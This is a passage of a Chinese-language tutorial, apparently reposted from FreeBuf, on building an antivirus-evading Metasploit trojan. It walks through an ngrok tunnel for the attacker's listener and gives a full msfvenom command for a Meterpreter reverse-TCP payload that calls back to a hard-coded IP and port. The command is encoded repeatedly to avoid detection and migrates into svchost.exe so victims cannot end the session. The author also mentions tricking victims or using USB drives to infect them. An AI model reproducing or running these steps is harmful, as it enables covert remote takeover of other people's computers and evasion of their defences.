分你所享、信息共享、轻松分享
来自民间的思想 | 送人玫瑰,手有余香。

Metasploit的简单木马免杀技术及后渗透面临的问题

*本文原创作者:cureall,本文属FreeBuf原创奖励计划,未经许可禁止转载 PS:本文仅用于技术交流与分享,严禁用于非法用途 698050_f493_3.jpg

一.配置ngrok准备内网穿透

内网穿透的必要性和原理就不用说了,直接说操作。首先到ngrok官网去注册一个号,国内也有一个sunny ngrok,但是我用了几次全失败了,所以推荐国外的,网址是:https://ngrok.com/。 我注册的时候面临验证码刷不出来,所以建议选择用github账号登陆就好。登陆好之后就在kali下载好对应版本的客户端。下载好之后你需要在kali上用他给你的凭证进行登陆—-命令行输入 ./ngrok authtoken (你的凭证字符串)。 凭证可以在官网上复制。 Clipboard Image.png 然后接着输入: ./ngrok tcp 1234 这的1234是你本地的端口,出现如下画面说明你成功了,然后让他一直开着。 Clipboard Image.png 左边就是给你用的端口,右边就是你本地的端口 然后你可以通过ping这个给你的网址得到IP,这个是ping不通的,不过可以得到IP就可以了。这个每次重新穿透的时候都会更换远程端口,这是比较egg疼的,不过免费嘛,算可以了。 Clipboard Image.png

二.木马的伪装与简单免杀

木马面临的最基本的问题就是免杀,如果不能免杀,被杀毒软件发现,其作用几乎为零,至于怎么感染别人,就得看你的忽悠能力或者USB的方式,但是首要的应该是免杀。 我采用的是比较简单的免杀方式,依靠msf生成的shellcode免杀。 在命令行输入: msfvenom -p windows/meterpreter/reverse_tcp -a x86 --platform windows LHOST=52.14.61.47 LPORT=13098-e x86/shikata_ga_nai -i 15 -b '\x00\' PrependMigrate=true PrependMigrateProc=svchost.exe-fc> /root/Desktop/shellcode.c 这里的paylload选择windows/meterpreter/reverse_tcp,LHOST和LPORT分别填ngrok给你的网址和端口,-e x86/shikata_ga_nai -i 15是用-e x86/shikata_ga_nai编码15次,而PrependMigrate=true PrependMigrateProc=svchost.exe使这个程序默认会迁移到svchost.exe进程,自己测试的时候不建议到这个进程而是其他的持久进程,这样别人打开之后就无法再常规的去关闭回连的会话。你还可以使用windows/meterpreter/reverse_tcp_rc4这个payload,对会话进行加密,增加免杀能力。 相信大家都试过,直接输出exe文件就算注入其他软件和进行编码n遍也会马上被查杀出来。多次测试发现用x86/shikata_ga_na编码超过12次以上再通过shellcode编译出来都能免杀。 如下图你的桌面会有一个shellcode.c文件